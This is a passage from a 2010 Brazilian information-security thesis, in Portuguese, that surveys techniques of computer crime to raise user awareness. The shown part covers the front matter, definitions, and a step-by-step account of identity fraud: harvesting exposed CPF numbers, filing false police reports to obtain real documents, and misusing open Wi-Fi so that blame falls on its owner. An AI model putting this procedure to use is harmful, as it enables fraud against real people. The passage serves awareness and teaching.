Pedro Tcc2.2.1
89
PEDRO RAMOS DE ALMEIDA JUNIOR TÉCNICAS UTILIZADAS PARA PRÁTICA DE CRIMES DE INFORMÁTICA SÃO CAETANO DO SUL/SÃO PAULO 2010 FACULDADE DE TECNOLOGIA DE SÃO CAETANO DO SUL
Transcript of Pedro Tcc2.2.1
PEDRO RAMOS DE ALMEIDA JUNIOR
TÉCNICAS UTILIZADAS PARA PRÁTICA DE CRIMES DE INFORMÁTICA
SÃO CAETANO DO SUL/SÃO PAULO 2010
FACULDADE DE
TECNOLOGIA
DE SÃO CAETANO DO SUL
PEDRO RAMOS DE AMEIDA JUNIOR
TÉCNICAS UTILIZADAS PARA PRÁTICA DE CRIMES DE INFORMÁTICA
Trabalho de Conclusão de Curso apresentado à Faculdade de Tecnologia de São Caetano do Sul, sob a orientação da Professora MSc Vanessa Tatiana de Brito, como requisito parcial para a obtenção do diploma de Graduação no Curso de Segurança da Informação.
São Caetano do Sul / São Paulo 2010
Nome: ALMEIDA, Pedro Ramos de Junior.
Título: TÉCNICAS UTILIZADAS PARA PRÁTICA DE CRIMES DE INFORMÁTICA.
Trabalho de Conclusão de Curso apresentado à Faculdade de Tecnologia de São Caetano do
Sul para obtenção do diploma de Graduação.
Aprovado em:
Banca Examinadora
Prof. Dr. ou MSc. _____________________Instituição: _______________
Julgamento: ________________Assinatura: ________________________
Prof. Dr. ou MSc. _____________________Instituição: _______________
Julgamento: _________________Assinatura: _______________________
Prof. Dr. ou MSc ______________________Instituição: _______________
Julgamento: ________________Assinatura: _________________________
DEDICATÓRIA
Dedico este trabalho a todos que de alguma forma contribuíram para sua realização, minha mãe, às pessoas que, voluntariamente, divulgam conhecimentos em prol do desenvolvimento social e tecnológico e, principalmente, ao meu avô Domingos Manha Ramirez (em memória) por sua preocupação em tentar transmitir tudo o que aprendeu ao longo da sua vida e fazer de mim uma pessoa curiosa.
AGRADECIMENTOS
Agradeço à minha orientadora e Professora Vanessa Tatiana de Brito, Prof. John Dale e Professora Cirlei Izabel da Silva Paiva pelas orientações na elaboração do trabalho. Também devo agradecimentos a Aline Ramires de Almeida, Alan Garcia, Bruno Honorio, Ana Luiza Galhumi, Professora Maria Márcia Matos Pinto e Professora Caroline Evangelista Lopes pelas revisões textuais e dicas de conteúdo.
"Se o conhecimento pode criar problemas, não é através da ignorância que podemos
solucioná-los."
Isaac Asimov.
ALMEIDA, Pedro Ramos Junior. Técnicas utilizadas para prática de crimes de
informática. Xxx folhas. Trabalho de Conclusão de Curso – Faculdade de Tecnologia de São
Caetano do Sul, São Caetano, 2010.
Resumo
Neste trabalho, são discutidas algumas das técnicas mais simples utilizadas para a
prática de crimes no âmbito computacional. A metodologia adotada foi a análise de exemplos
práticos de como alguns crimes são cometidos e a realização de experimentos com o objetivo
abordar as falhas tecnológicas relacionadas à área de segurança de informação. Este trabalho e
a adoção de tal metodologia justificam-se pela falta de consciência que muitas pessoas têm
sobre a necessidade de segurança das informações. O fato é que muitas pessoas nem mesmo
fazem atualizações de segurança sem saber que, mesmo sem documentos importantes, o
computador pode ser utilizado remotamente para diversas finalidades. A análise dos crimes
feita nesta monografia tem foco nos cometidos por pessoas que possuem conhecimento entre
os níveis básico e intermediário em informática. Dentre os crimes abordados, estão os de
roubo, furto, invasão de privacidade, falsidade ideológica, sequestro e até mesmo crimes
hediondos. A pesquisa utiliza-se de uma linguagem simplificada e acessível, explicando
termos técnicos de difícil entendimento para que, mesmo as pessoas que não estão
acostumadas aos jargões da área possam entender a necessidade de se proteger contra tais
crimes, após descobrir com que facilidade eles são cometidos. Os resultados obtidos pela
demonstração da facilidade de se cometer crimes de informática são as medidas de segurança
que usuários de sistemas de informática passarão a adotar e a conclusão de que, para se
proteger, é necessário conhecer os atacantes e as técnicas de ataque.
PALAVRAS-CHAVE: Crimes de informática; técnicas hacker/cracker; conscientização;
segurança de informação.
ALMEIDA, Pedro R. J. Techniques used for computer crimes. Xxx pages. Completion of
coursework – São Caetano do sul College of Technology, São Caetano, 2010.
Abstract
In this paper, are discussed some of the simplest techniques used to commit crimes
within computing. The adopted methodology was the analysis of practical examples of how
some crimes are committed and the conducting experiments with the objective to broach the
technological failures in the information security. This work and the adoption of such methods
are justified by the lack of awareness that some people have about the importance of
information security. The fact is that some people do not make security updates without
knowing that, even without important documents, the computers can be used remotely by a
cracker for different purposes. The analysis of the crimes that are done in this paperwork has
focused on those ones committed by people who do not have experience with computers and
people who have basic knowledge. Among the crimes broached in this paper are theft,
invasion of privacy, forgery, kidnapping and other crimes. The research makes use of a
simplified and accessible language, explaining difficult technical terms so that even people
who are not accustomed to jargon can understand the necessity of protection against such
crimes after discovering how easily they are committed. The results gotten from the
demonstration of the easiness of committing computer crimes are the security measures that
users of computer systems will take and the conclusion that, to protect the computers systems,
it is necessary to know the aggressors and the attack techniques.
KEYWORDS: Computer Crimes; hacker/cracker techniques; awareness; information
security.
Lista de ilustrações
Figura 1 Principal obstáculo para a implementação de segurança .................................. 20
Figura 2 Resultados da pesquisa para o termo "CPF: " Mario ....................................... 21
Figura 3 Tela de recuperação retirada do DVD do Windows Vista.................................. 28
Figura 4 Prompt de comando (cmd.exe) renomeado para “sethc.exe” ............................ 30
Figura 5 Alteração da senha ................................................................................................. 31
Figura 6 Obter propriedade de arquivo .............................................................................. 32
Figura 7 Obter propriedade de arquivo (2) ….................................................................... 32
Figura 8 Obter propriedade de arquivo (3) ........................................................................ 33
Figura 9 Obtendo permissões ............................................................................................... 33
Figura 10 Tela do Windows Millennium ............................................................................. 34
Figura 11 Opções para alterar o sistema Windows ............................................................ 36
Figura 12 Opções para alterar senhas dos usuários .......................................................... 37
Figura 13 Finalização do processo de exclusão de senha ................................................... 38
Figura 14 Obter arquivos “SAM” e “system” com o sistema em execução ..................... 39
Figura 15 Utilização do Cain ................................................................................................ 40
Figura 16 Força bruta com o Cain ...................................................................................... 41
Figura 17 Crackeando .......................................................................................................... 42
Figura 18 Senhas das redes sem fio já acessadas ............................................................... 43
Figura 19 Brutus ................................................................................................................... 44
Figura 20 Wordlist ................................................................................................................. 44
Figura 21 Quebra de senha de e-mail .................................................................................. 45
Figura 22 Invasão de site ...................................................................................................... 46
Figura 23 Screenshots do batch ............................................................................................ 50
Figura 24 Compilar batch ..................................................................................................... 51
Figura 25 Executar de forma invisível …............................................................................ 53
Figura 26 Incluir quaisquer arquivos ao programa …....................................................... 54
Figura 27 Incluir ícone …...................................................................................................... 54
Figura 28 Comparação de arquivos …................................................................................ 55
Figura 29 Redirecionamento do site …................................................................................ 56
Figura 30 Salvar site …......................................................................................................... 58
Figura 31 Página WEB completa …..................................................................................... 59
Figura 32 Site falso …............................................................................................................ 59
Figura 33 Anonymail …........................................................................................................ 61
Figura 34 Achilles ….............................................................................................................. 64
Figura 35 Configurar proxy …............................................................................................. 65
Figura 36 Dados de agência e conta corrente …................................................................. 67
Figura 37 Dados capturados …............................................................................................ 68
Figura 38 Teclado virtual …................................................................................................. 68
Figura 39 Tela de interceptação de dados do cliente …...................................................... 69
Figura 40 Tela de alerta ….................................................................................................... 70
Figura 41 Interfaces ….......................................................................................................... 72
Figura 42 Habilitar modo monitor ….................................................................................. 73
Figura 43 Airodump-ng ….................................................................................................... 73
Figura 44 Salvar pacotes capturados ….............................................................................. 74
Figura 45 Resultados do ataque PTW …............................................................................. 75
Figura 46 Autenticação falsa …............................................................................................ 76
Figura 47 Modificar o MAC …............................................................................................. 76
Figura 48 Criar e enviar pacotes forjados …...................................................................... 77
Figura 49 Enviando pacotes forjados ….............................................................................. 78
Figura 50 Capturar dados de ponto de acesso e canal específico …................................. 79
Figura 51 Verificar clientes conectados …........................................................................... 79
Figura 52 Capturando handshake …................................................................................... 80
Figura 53 Descobrir senha …................................................................................................ 81
Figura 54 Senha encontrada …............................................................................................ 81
Sumário
1 Introdução ........................................................................................................................... 13
1.1 Objetivos ..................................................................................................................... 14
2 Conceitos básicos e definições ........................................................................................... 16
2.1 Crime ........................................................................................................................... 16
2.2 Distinções do hacker e cracker; hackerismo e crackerismo..................................... 16
2.3 Firewall ........................................................................................................................ 18
2.4 “Laranja” .................................................................................................................... 18
2.5 Segurança em ambientes corporativos ..................................................................... 18
2.6 Conscientização .......................................................................................................... 19
2.7 Obtenção de dados ..................................................................................................... 20
2.8 Como os criminosos escolhem um “laranja” ........................................................... 21
2.9 Exemplos reais de crimes ........................................................................................... 23
2.9.1 Incidentes envolvendo bancos ........................................................................... 24
2.9.2 Invasões ............................................................................................................... 24
2.9.3 Sequestro ............................................................................................................. 25
3 Técnicas e conhecimentos básicos ..................................................................................... 26
3.1 Engenharia social ........................................................................................................ 26
3.2 Outras formas de ligar o computador ....................................................................... 27
3.3 Obter acesso completo a sistemas Windows protegidos por senha ......................... 29
3.3.1 Senhas do Windows 95,98 e Millennium .......................................................... 34
3.3.2 Senhas do Windows NT e 2000 ......................................................................... 34
3.3.3 Senhas do Windows XP, 2003, Vista e 7 ........................................................... 35
3.3.4 Descobrir senhas sem alterá-las ........................................................................ 38
3.3.4.1 Senhas armazenadas no computador ..................................................... 42
3.3.4.2 Invasão de contas de e-mail e sites por meio da senha .......................... 43
4 Técnicas que demandam conhecimentos básicos ............................................................ 47
4.1 Criação de um programa para fins maliciosos ........................................................ 47
4.1.2 Arquivos de processamento em lote (batch) ..................................................... 47
4.1.2.1 Como compilar um arquivo de processamento em lotes ....................... 50
4.1.3 Como um vírus pode ser anexado a outro arquivo ......................................... 51
4.2 DNS spoofing .............................................................................................................. 55
4.3 Fraude em contas bancárias ...................................................................................... 57
4.3.1 Pharming ............................................................................................................. 57
4.3.2 Phishing scam e e-mail spoofing ........................................................................ 61
4.3.3 Man In The Middle (MITM) e sequestro de sessão ......................................... 63
4.4 Quebra de senhas de redes sem fio ........................................................................... 71
4.4.1 Captura de tráfego ............................................................................................. 71
4.4.2 Como quebrar senhas WEP .............................................................................. 74
4.4.2.1 Como fazer autenticação falsa e acelerar o tráfego ............................... 76
4.4.3 Descoberta de senhas WPA/WPA2 ................................................................... 78
4.5 Computadores “zumbis” ........................................................................................... 83
4.5.1 Ataque DdoS ....................................................................................................... 83
4.5.2 Outros tipos de ataques feitos por computadores “zumbis” .......................... 85
5 Considerações finais ........................................................................................................... 86
6 Referências bibliográficas ................................................................................................. 87
13
1 Introdução
Este estudo tem como intento descrever como alguns crimes de informática podem ser
cometidos por pessoas que não possuem conhecimentos avançados na área. Muito se tem
afirmado que é um “mito” a necessidade de aprender técnicas de ataque para poder se
defender com eficiência (RUFINO, 2002), porém, pesquisas mostram que a quantidade de
crimes cometidos pela internet cresce em ritmo acelerado (CERT.BR, 2010) e levam a crer
que os atuais mecanismos de segurança adotados não são eficientes ou suficientes. Segundo
pesquisas atuais, o principal fator responsável pelo grande número de problemas relacionados
à segurança da informação é a má utilização das tecnologias (FECOMERCIO, 2010), e uma
das medidas consideradas mais eficientes no combate aos incidentes é a conscientização dos
usuários (RODRIGUES, 2010).
Um profissional que atua em um seguimento completamente distinto da informática,
dificilmente possui conhecimentos avançados para manipular regras de firewall, configurar
seu antivírus de forma eficiente, saber quais ações tomar quando ameaças são encontradas,
verificar cabeçalhos de e-mails e saber quais são confiáveis, ou ainda, deduzir com destreza
em quais locais ele pode ou não clicar.
Para uma pessoa que, não necessariamente precisa entender a fundo os sistemas
computacionais a fim de realizar as funções correlatas à sua profissão, como um médico,
advogado, metalúrgico, ou, até mesmo, pessoas que utilizam computadores com frequência,
mas não necessitam de conhecimentos avançados para desemprenhar suas funções, como
secretárias ou gerentes de empresas, o estudo de meios técnicos utilizados para uma proteção
eficiente pode causar enfado e não ser eficiente na prevenção de incidentes. Considerando
como correta a conclusão de que, é mais eficiente apontar as fragilidades nos processos do
que apenas aconselhar usuários sobre boas práticas de segurança, neste trabalho, são
discutidos alguns crimes que podem ser cometidos com certa facilidade, incidentes que
ocorrem com frequência, mas são encobertos para não denegrir a imagem de empresas e, é
feita uma tentativa de demonstrar que nem sempre se deve confiar veementemente em sites
que exibem mensagens dizendo serem cem por cento seguros ou em processos e programas
que não levantam suspeitas.
Devido ao rápido avanço da tecnologia, muitas das ferramentas que exploram as
vulnerabilidades, técnicas de ataque e brechas de segurança aqui discutidas, certamente
ficarão obsoletas com o passar do tempo e não mais poderão ser usadas. Porém, assim como,
14
ainda hoje é possível explorar falhas e brechas existentes desde o começo da era da
informática, possivelmente, muitos anos ainda serão necessários para que este trabalho se
torne totalmente desatualizado, principalmente no que diz respeito à principal brecha de
segurança hoje existente: as falhas humanas.
É fato que as ferramentas e técnicas utilizadas por criminosos que atuam na área de
informática evoluíram desde o surgimento dos primeiros computadores, no entanto, as
técnicas de defesa também evoluíram de forma considerável.
Com a utilização de boas ferramentas de proteção e configurações bem elaboradas, a
maior brecha de segurança passa a ser a fraude ou erro humano. Para mitigar riscos oriundos
de falhas humanas, dois fatores são de extrema importância: o treinamento e a
conscientização. Com a falsa ideia que algumas pessoas têm sobre a frequência com que os
crimes de informática são cometidos e sobre o nível de conhecimento necessário para cometê-
los, convencer alguém sobre a necessidade de adotar medidas de segurança, em alguns casos,
torna-se um desafio.
1.1 Objetivos
O objetivo principal deste trabalho é demonstrar que, para aumentar o nível de
segurança de informações em ambientes domésticos ou corporativos, a divulgação de técnicas
que são utilizadas para a prática de crimes de informática pode servir como uma forma de
defesa e um recurso para conscientizar pessoas sobre a necessidade de se proteger dos
incidentes dos incidentes de informática. Até mesmo em jornais televisivos são dados
conselhos de como utilizar os computadores com mais segurança; porém, ainda há muitas
pessoas que não têm medo de se expor totalmente em sites de relacionamento pessoal ou
mesmo fazer transações bancárias com computadores cheios de vírus. Neste trabalho, a
tentativa de conscientização é feita de uma forma diferente e que pode ser muito eficiente, que
é demonstrar, com exemplos práticos, como é fácil, a partir de um computador, cometer atos
que podem trazer sérias consequências para qualquer pessoa que utiliza a internet no seu
cotidiano. Além de objetivar ajuda no trabalho de profissionais que atuam na área de
segurança de informação e que precisam convencer as pessoas da necessidade de proteção, o
conteúdo aqui expresso pode ser de grande valia também para usuários domésticos que se
sentem seguros somente por deixar de acessar sites de bancos ou por não possuir arquivos
importantes armazenados em seus computadores.
15
Outro objetivo importante é discutir um conhecimento erroneamente escondido,
proibido em alguns sites e, muitas vezes, não transmitido nem mesmo em cursos de segurança
de informação, que é o conhecimento utilizado para prática de crimes de informática.
Atualmente, a divulgação de técnicas hacker/cracker é feita de uma maneira que somente
pessoas bem interessadas no assunto, competentes administradores de redes, bons
programadores ou criminosos conseguem tais informações. Em outras palavras, tal como
acontece com o acesso às armas de fogo, apenas as pessoas mal intencionadas ou uma minoria
de curiosos e pessoas com boas intenções detêm tais informações.
Não faz parte dos objetivos deste trabalho a divulgação de conhecimentos para serem
utilizados a fim de prover prejuízo alheio ou cometer qualquer forma de fraude, mesmo
porque, as técnicas aqui utilizadas não são destinadas a crackers ou usuários avançados, pois
estes, possivelmente já possuem conhecimento de técnicas melhor elaboradas e mais
eficientes.
16
2. Conceitos básicos e definições
Para melhor entender as ideias apresentadas e evitar interpretações errôneas, torna-se
necessário esclarecer alguns termos e palavras que são usadas constantemente neste trabalho,
não só para auxiliar pessoas de outras áreas e que não estão acostumadas com a linguagem
utilizada no mundo da informática, mas também para evitar interpretações diferentes por
pessoas já familiarizadas com alguns termos.
2.1 Crime
Na primeira edição do dicionário Aurélio, podemos encontrar a seguinte definição para
a palavra crime: “violação culpável da lei penal; delito” (1989, p.187). Neste trabalho, é
tratada como crime, não só a transgressão penal ou ação antijurídica que vai contra as leis
brasileiras ou internacionais vigentes, mas também qualquer ato praticado intencionalmente e
que pode trazer consequências sociais ou pessoais desastrosas ou nefastas. Um dos motivos
para a adoção de tal critério é devido às leis vigentes ainda não contemplarem muitos dos atos
maléficos que podem ser praticados no mundo digital. Na grande maioria dos casos de crimes
digitais, ainda são utilizadas leis antigas para punir crimes novos; por exemplo, para punir
crimes como os de visualização de mensagens eletrônicas alheias, utilização de dados
incorretos para preenchimento de formulários digitais e, mediante artifício ou ardil, ludibriar
pessoas pela internet para benefício próprio com prejuízo alheio, são utilizadas as leis de
invasão de privacidade, falsidade ideológica e estelionato, respectivamente. A adoção de leis
específicas para punir crimes digitais é motivo de grande discussão, atualmente, no Brasil.
2.2 Distinções do hacker e cracker; hackerismo e crackerismo
Um equívoco frequentemente cometido por pessoas de diversas áreas não correlatas à
informática é referir-se a um cracker e utilizar o termo “hacker”. Baseando-se na origem do
termo, o hacker pode ser considerado como, dentre outras coisas, um bom programador, um
experto em eletrônica ou um bom conhecedor de sistemas computacionais. Sobre o cracker,
não é frequente que haja discórdia nas definições para o termo e o significado da palavra
torna-se pouco mais claro se comparado ao hacker. Ainda não é comum que definições para o
termo sejam encontradas em dicionários (principalmente os brasileiros), porém, é possível
17
encontrar em alguns específicos de informática. Segundo Carlos Eduardo Morimoto,
Existem duas definições diferentes para este termo.
Na primeira, o cracker é um vândalo virtual, alguém que usa seus
conhecimentos para invadir sistemas, quebrar travas e senhas, roubar dados [..]
Uma segunda definição, mais branda, é alguém que quebra travas de
segurança de programas e algoritmos de encriptação, seja para poder rodar jogos
sem o CD-ROM, ou gerar uma chave de registro falsa para um determinado
programa, quebrar as travas anti-cópia usadas em alguns softwares, quebrar o
sistema de encriptação do DVD (este último realmente importante, pois permitiu que
os usuários do Linux e outros sistemas não Windows pudessem assistir DVDs). Ou
seja, nesta segunda definição o Cracker é alguém na margem da lei, cujas ações
ainda são ilegais, embora muitas vezes eticamente justificáveis (os usuários têm
direito a fazer cópias de CDs legalmente comprados, tem direito de assistir DVDs no
Linux e assim por diante) (2002, p.134).
Enfatizando as afirmações de Morimoto, é possível dizer que as definições que
encontramos para o termo cracker não costumam ser muito diferentes umas das outras, visto
que, quem não conhece as diferenças entre um hacker e um cracker, como muitos jornalistas
não especializados em notícias de informática, frequentemente referem-se ao cracker e
utilizam o termo “hacker”. O termo “hacker” pode ainda ser ramificado em diversas outras
terminologias como o Black hat, White hat, Phreaker, Coder e várias outras dependendo do
tipo de hacker. Tais terminologias não são utilizadas neste documento, portanto, não há
necessidade de explicá-las para o entendimento do conteúdo.
No dicionário de internet e informática, de Márcia Regina Sawaya os hackers são:
“programadores tecnicamente sofisticados, que dedicam boa parte de seu tempo a conhecer,
dominar e modificar programas e equipamentos.” (1999, p. 208).
Há uma imensa quantidade de dicionários e sites na internet que definem estes termos,
portanto, estabelecer uma definição exata é algo complexo. Segundo Morimoto, “a confusão é
tanta que existem casos de livros e mesmo filmes legendados, onde o termo "Cracker" é
substituído por "Hacker" pelo tradutor, sem a menor cerimônia.”(2002, p.198).
Para evitar interpretações equivocadas neste trabalho, devem ser levadas em conta as
seguintes definições para quando são citadas as palavras hacker, hackerismo, cracker e
crackerismo:
Hacker: Pessoa com elevado conhecimento técnico em determinada área (no caso
deste trabalho, conhecimento em informática);
18
Hackerismo: Corrente ou doutrina que um hacker segue;
Cracker: Perito em informática que, muitas vezes, utiliza-se de seu conhecimento para
praticar ações criminosas e/ou que vão contra as leis penais;
Crackerismo: Corrente ou doutrina que um cracker segue.
2.3 Firewall
Esta palavra, cuja tradução literal é “parede de fogo”, será bastante utilizada no texto e
seu entendimento é fundamental para a perfeita compreensão do conteúdo.
Um firewall pode ser um software que, após ser instalado e configurado em um
computador, tem a função de bloquear acessos e conexões suspeitas ou previamente
bloqueadas. Além de um software, um firewall pode ser um componente dedicado
exclusivamente para analisar o tráfego e controlar os acessos que são permitidos ou não. Em
médias e grandes empresas, são utilizados equipamentos cuja única função é a de firewall, o
que evita a lentidão na rede e permite maior precisão no controle de acesso.
A definição abaixo, além de breve e simples, permite o entendimento básico do
conceito de firewall.
"Programa ou componente dedicado, que protege a rede contra invasões externas e
acessos não autorizados.” (MORIMOTO, 2002, p.181).
2.4 “Laranja”
Não foi encontrada nenhuma outra palavra mais formal e que não tenha sentido
figurado para reproduzir fielmente o significado deste termo.
Quando a palavra “laranja” é mencionada nesta pesquisa, ela tem o seguinte
significado: Indivíduo, nem sempre ingênuo, que ajuda, de forma involuntária ou não, com
seu nome e/ou dados pessoais, a concretização de um crime e recebe o ônus total ou parcial
sobre ele.
2.5 Segurança em ambientes corporativos
O nível de segurança implantada em uma empresa deve ser diretamente proporcional
19
ao valor de seus ativos e o grau de risco que eles estão expostos. No mercado, podemos
encontrar diversas soluções de segurança voltadas para o ambiente corporativo que
incrementam a segurança dos sistemas. Muitas vezes, tais soluções são realmente necessárias,
porém, tratadas como opcionais. A maioria das técnicas apresentadas neste trabalho,
consideradas técnicas de lammers ou script kiddies (iniciantes), podem ser facilmente
bloqueadas com soluções simples. Na maioria dos casos apenas uma boa configuração é
suficiente para se prevenir, o que não exige a aquisição de programas ou equipamentos.
A segurança em empresas (mesmo nas pequenas) deve ser diferenciada e algumas
medidas genéricas, básicas e importantes são:
-Aquisição e constante atualização de antivírus corporativo;
-Configuração personalizada de firewall;
-Constante atualização dos programas e sistemas operacionais da empresa;
-Adoção de políticas de segurança e conscientização de funcionários.
As medidas supracitadas são recomendadas a qualquer tipo e porte de empresa.
Medidas adicionais, entretanto, podem e devem ser tomadas de acordo com a realidade de
cada empresa.
Devido às técnicas avançadas e requintadas que alguns criminosos utilizam, somente
instalar um antivírus e manter o computador atualizado não são medidas que garantam a
segurança de nossas redes.
2.6 Conscientização
A conscientização dos usuários domésticos e corporativos sobre a necessidade de
tomar medidas que garantam a segurança dos sistemas é, indubitavelmente, o maior desafio
encontrado para garantir a integridade, confidencialidade e disponibilidade de informações.
Tal afirmação pode ser comprovada com dados de diversas pesquisas, como a Décima
pesquisa nacional de segurança de informação feita pela empresa de segurança “Módulo
Security Solutions”. Na figura abaixo, extraída desta pesquisa, é possível verificar os dados de
aproximadamente 600 questionários presenciais e on-line, nos quais foram ouvidos
profissionais da área de tecnologia e segurança de informação, distribuídos pelos diversos
setores da economia. Os dados correspondem à metade das mil maiores empresas brasileiras.
20
Principal obstáculo para a implementação de segurança. Figura 1.
Fonte: Módulo Security Solutions (2002, p.7).
2.7 Obtenção de dados
Um dos motivos que mais possibilita pessoas mal intencionadas cometerem crimes de
informática é a exposição de dados. Há diversos dados que um criminoso pode utilizar para
cometer um crime. Com o auxílio de um computador, muitos deles podem ser encontrados
como: dados cadastrais que circulam livremente na internet, identificações únicas em
processadores e placas de rede, logs (arquivos que armazenam dados sobre o que acontece em
um sistema), histórico de navegação, cookies (documentos de texto armazenados pelos
navegadores), lista de documentos recentes, mensagens de comunicadores instantâneos e até
mesmo documentos do pacote de programas Microsoft Office que armazenam informações
sobre quem criou o documento (THOMPSON, 2004).
Atualmente, uma das melhores formas de se conseguir informações são os sites de
busca na internet. Através deles, é possível obter informações das mais diversas sobre várias
pessoas que nem imaginam ter seu nome exposto na internet Estas informações são
frequentemente oriundas de cadastros feitos em sites ou, até mesmo, cadastros feitos em
estabelecimentos físicos.
Não são só dados cadastrais que circulam pela internet. Segundo Rafael Sbarai em um
artigo publicado na revista Veja, em abril de 2010, o Facebook, uma das maiores redes sociais
21
do mundo (supera a marca de 400 milhões de usuários), em sua décima sétima mudança nas
políticas de privacidade, tornou públicos os dados de todos os seus usuários. Dentre as
informações contidas nestes dados estão: nome, profissão, cidade, lista de amigos e álbum de
fotos. Ainda de acordo com a reportagem, as autoridades de proteção de dados da União
Europeia consideraram esta abertura como “inaceitável” (SBARAI, 2010).
Além das fontes já citadas, também é possível encontrar informações de alto valor em
sites como: http://telelistas.net/, http://www.previdenciasocial.gov.br/,
http://www.detran.sp.gov.br/, http://www.registro.br/, http://www.whois.net/,
https://registro.br/cgi-bin/whois/ e muitos outros.
2.8 Como os criminosos escolhem um “laranja”
A escolha de um “laranja” é extremamente útil para um criminoso cometer diversos
tipos de crimes e torna-se requisito básico para quem não quer ser descoberto.
Há diversas formas de se escolher um” laranja”. Uma das formas mais simples é
utilizar sites de busca na internet para conseguir dados de pessoas com o nome limpo. A
quantidade de dados e a facilidade de obtê-los possibilitam ao criminoso escolher até mesmo
que nome ele quer utilizar.
No exemplo a seguir, foi utilizado um navegador comum para entrar no site
“www.google.com.br” e, supondo que o criminoso tenha escolhido um nome comum como
“Mario”, foi digitado o seguinte: "CPF: " Mario.
Resultados da pesquisa para o termo "CPF: " Mario. Figura 2
22
Na imagem de exemplo é possível observar que, logo nos três primeiros resultados da
busca, o criminoso pode achar algo que possivelmente lhe interesse. O primeiro resultado
mostra até mesmo o endereço (além do CPF) de um Mário que possivelmente mora em Minas
Gerais. No segundo, é possível verificar um site do governo federal divulgando informações
pessoais de diversas pessoas para, literalmente, quase o mundo inteiro. No terceiro resultado,
mais uma vez é possível visualizar o nome, CPF e endereço de outra pessoa que se chama
Mario. Após a rápida obtenção destes dados, o criminoso pode entrar no site
“http://www.receita.fazenda.gov.br/aplicacoes/atcta/cpf/consultapublica.asp” e verificar a
situação cadastral do CPF para não correr o risco de ter algum insucesso ao cometer fraudes
devido a problemas com o documento.
Com o nome completo da pessoa e outros dados pessoais, muitas vezes é possível
encontrar em outros sites diversas informações do futuro “laranja”. Caso o criminoso queira ir
mais além, pode escolher um “laranja” que tenha mais ou menos sua idade (preferencialmente
de outro estado), fazer um boletim de ocorrência passando-se pelo “laranja” em alguma
delegacia dizendo que foi assaltado e teve todos os seus documentos roubados, e começar a
providenciar, legalmente, novos documentos. O criminoso pode conseguir uma certidão de
nascimento em um cartório e, levando em consideração que a carteira de identidade é de
responsabilidade dos governos estaduais e válida em todo o território nacional, de posse da
certidão de nascimento e quatro fotos, a pessoa com más intenções pode tentar fazer a carteira
de identidade em algum estado que não adotou o novo documento com chip e banco de dados
integrado de impressões digitais (SIQUEIRA, 2010).
Após conseguir documentos como RG, CPF e certidão de nascimento, todos eles
expedidos por órgãos oficiais, é possível obter ainda mais documentos, alugar
temporariamente uma casa, abrir conta em banco, pegar empréstimos, fazer compras e,
posteriormente, descartar todos os documentos do “laranja” e voltar para seu estado de origem
com os bens adquiridos, agindo como se nada tivesse acontecido. Possivelmente, a pessoa
lesada só irá perceber o que aconteceu quando for investigar o motivo de seu nome estar
“sujo”. Mesmo se conseguir provar que não fez compras ou pegou empréstimos, terá muitos
problemas para reparar todo o dano causado.
Com o exemplo acima é possível concluir que, se nenhum site na internet tratasse
dados pessoais como se fossem informações públicas, o criminoso não teria tanta facilidade
para agir. O exemplo também permite afirmar que não é necessário um elevado conhecimento
em informática para utilizar a tecnologia como ferramenta principal na hora de cometer um
23
crime.
Outras artimanhas menos conhecidas também podem ser utilizadas para escolher um
“laranja” para realização de crimes.
Muitas pessoas compram equipamentos como dispositivos de rede sem fio e apenas
ligam o equipamento, preservando as configurações originais de fábrica. Por padrão, a grande
maioria desses equipamentos não possui qualquer configuração de segurança como, por
exemplo, uma senha de acesso. Uma pessoa com conhecimentos extremamente superficiais
de informática pode, sem dificuldade alguma, utilizar a conexão com a internet da pessoa
descuidada e praticar atividades como, por exemplo, acessar sites de pornografia infantil.
Neste caso, o acesso pode ser rastreado pela polícia e, a pessoa que primeiramente será
encontrada é a dona do equipamento sem fio. Mesmo se for definida uma senha para acesso
lógico ao equipamento, uma pessoa com conhecimentos intermediários em redes sem fio pode
facilmente descobrir a senha se ela não for complexa e de um padrão de tecnologia
(protocolo) seguro. Mesmo uma pessoa que não possui equipamentos de rede sem fio, mas
mantém seu computador desatualizado, muitas vezes com vírus, também pode, com grande
facilidade, tornar-se um “laranja” tendo seu computador invadido.
Outra forma de se utilizar um “laranja”, bastante verificada em empresas, é realizar
um procedimento chamado e-mail spoofing. Esta técnica consiste em forjar um e-mail, muitas
vezes com um remetente que é conhecido da pessoa que recebe. Um exemplo de como esta
técnica pode ser utilizada é um criminoso utilizar o endereço de e-mail de algum funcionário
de uma empresa, passando-se por ele, e tentar obter alguma informação que poucas pessoas
conseguiriam.
2.9 Exemplos reais de crimes
Os crimes de informática, dos mais brandos aos mais nefastos, acontecem com grande
frequência em vários países e empresas com diferentes níveis de segurança. A grande maioria
das pessoas não dá a importância devida às notícias ou, muitas vezes, nem fica sabendo delas.
Os bancos, por exemplo, não costumam divulgar seus incidentes de segurança por razões
óbvias – quem confiaria seu dinheiro a um banco declaradamente inseguro? –, porém, é
possível encontrar diversos relatos pessoais e não formais. Por exemplo, se a frase ”Caixa
eletrônico do Banco invadido por hackers”, for digitada no campo de busca do maior site de
compartilhamento de vídeos do mundo, será mostrado um vídeo onde há um caixa eletrônico
24
de uma instituição financeira brasileira de grande porte com a imagem de uma mulher nua.
Uma suposta vítima de fraude filmou o caixa eletrônico e narrou o fato possivelmente
ocorrido.
Para dar mais credibilidade às hipóteses e exemplos citados ao longo deste trabalho, foram
extraídas de jornais respeitados, tribunais de justiça e revistas, algumas notícias que podem
confirmar as afirmações do parágrafo acima.
2.9.1 Incidentes envolvendo bancos
O banco Bradesco S/A foi condenado pelo Tribunal de Justiça de Minas Gerais a indenizar
um advogado que sofreu uma invasão cracker e teve um prejuízo de R$ 8.626,31. O
advogado obteve direito de ressarcimento do valor, além de uma indenização por danos
morais no valor de R$ 5.800. Assim que percebeu algo de errado com sua conta, o advogado
contatou o gerente do banco e foi informado de que nada poderia ser feito. O advogado então
registrou um boletim de ocorrência, notificou oficialmente a agência e, segundo ele, o banco
não respondeu aos apelos. Em sua defesa, o banco Bradesco declarou que a vítima
possibilitou que terceiros tivessem acesso à sua senha de uso pessoal e intransferível, além de
declarar que o sistema de segurança do banco é infalível (TRIBUNAL DE JUSTICA DE MINAS
GERAIS, 2010).
Um cracker brasileiro de 24 anos foi preso no dia 04/06/2010 após pedir US$ 500 mil a
um banco de investimentos de São Paulo para evitar o roubo de US$ 2 milhões. O cracker
enviava e-mails para o banco com informações sigilosas (para provar que tinha acesso ao
sistema) e passava um número de celular para contato (o celular foi comprado com os dados
